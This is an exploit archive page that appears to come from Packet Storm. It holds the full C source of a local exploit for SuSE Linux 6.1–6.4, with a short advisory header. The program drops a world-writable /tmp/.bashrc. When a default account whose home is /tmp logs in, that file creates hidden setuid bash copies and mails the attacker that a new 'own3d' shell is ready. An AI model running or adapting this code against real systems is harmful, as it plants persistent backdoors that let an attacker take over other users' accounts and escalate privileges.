SuSe 6.1 through 6.4 local exploit - when root switches users, /tmp/ will be the $HOME. This exploit will create a suid (user) shell when root su's to a user account.
0c640e5bd6cad6ab1a9f902ec11367abac1597d2768eedf475e4293e23c3c435/*
SuSe Local tmp Xploit by wildcoyote@coders-pt.org
Advisorie:
In 'all' versions of SuSe, default shell users have /tmp/ for their $HOME!
Because /tmp/ is world writable, any user on the shell can make a shell
dot file (like .bashrc) wich the default'shell'users will execute on log on!
When does this happen? Example: when r00t suids to a user like nobody :]
Vulnerable (checked):
SuSe Linux 6.4
SuSe Linux 6.3 ppc
SuSe Linux 6.3 alpha
SuSe Linux 6.3
SuSe Linux 6.2
SuSe Linux 6.1 alpha
SuSe Linux 6.1
This information was taken from a security focus advisorie!
(by a unknown (to me) poster)
*/
#include <stdio.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/stat.h>
#define HIDDEN_DIR_TO_STORE_SHELLS "/tmp/.nothing_to_declare/"
#define PATH_TO_SYSTEM_MAIL "/bin/mail"
#define SUBJECT_FOR_MAIL "got another own3d shell"
#define DEFINED_WARN_MSG "Hey! Just wanna warn you that i gave you another shell!"
main(int argc, char *argv[])
{
FILE *fx;
char buf[512];
printf("\n\t\tSuse Local tmp Xploit by wildcoyote@coders-pt.org\n\n");
if(argc==1)
{
printf("Sintaxe: %s <username/valid mail account>\n",argv[0]);
printf("Example:\n\n");
printf(" -> If you want to be warned of a *new* own3d shell on tha b0x:\n");
printf(" %s wildcoyote\n",argv[0]);
printf(" -> If you want to be warned to a mail account (other then your shell):\n");
printf(" %s wildcoyote@coders-pt.org\n\n",argv[0]);
printf("Stay kewl :]\n\n");
exit(-1);
}
printf("Generating .bashrc...");
remove("/tmp/.bashrc"); // Just to make sure...
fx=fopen("/tmp/.bashrc","a");
fputs("# Yeaps! This is a shell dot file wich will gimme lots of default shell accounts on thiz suse box :))\n",fx);
snprintf(buf,sizeof(buf),"if test -d %s\n",HIDDEN_DIR_TO_STORE_SHELLS);
fputs(buf,fx);
bzero(buf,strlen(buf));
fputs("then teste=1\n",fx);
snprintf(buf,sizeof(buf),"else mkdir %s ; chmod 777 %s\n",HIDDEN_DIR_TO_STORE_SHELLS,HIDDEN_DIR_TO_STORE_SHELLS);
fputs(buf,fx);
bzero(buf,strlen(buf));
fputs("fi\n",fx);
fputs("a=$RANDOM\n",fx);
snprintf(buf,sizeof(buf),"cp /bin/bash %sown3d.$a\n",HIDDEN_DIR_TO_STORE_SHELLS);
fputs(buf,fx);
bzero(buf,strlen(buf));
snprintf(buf,sizeof(buf),"chmod 6777 %sown3d.$a\n",HIDDEN_DIR_TO_STORE_SHELLS);
fputs(buf,fx);
bzero(buf,strlen(buf));
snprintf(buf,sizeof(buf),"%s -s '%s' %s %s\n",PATH_TO_SYSTEM_MAIL,SUBJECT_FOR_MAIL,argv[1],DEFINED_WARN_MSG);
fputs(buf,fx);
fclose(fx);
printf("DONE\n");
chmod("/tmp/.bashrc",00777);
printf("Oh k! /tmp/.bashrc is now created! :]\n");
printf("When r00t suids to one of the default shell'userz wich have /tmp as their $HOME\n");
printf("It will run /tmp/.bashrc and give you a own3d shell ;)\n");
printf("(own3d shells will stay on %s)\n",HIDDEN_DIR_TO_STORE_SHELLS);
printf("Regardz, wildcoyote@coders-pt.org\n\n");
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed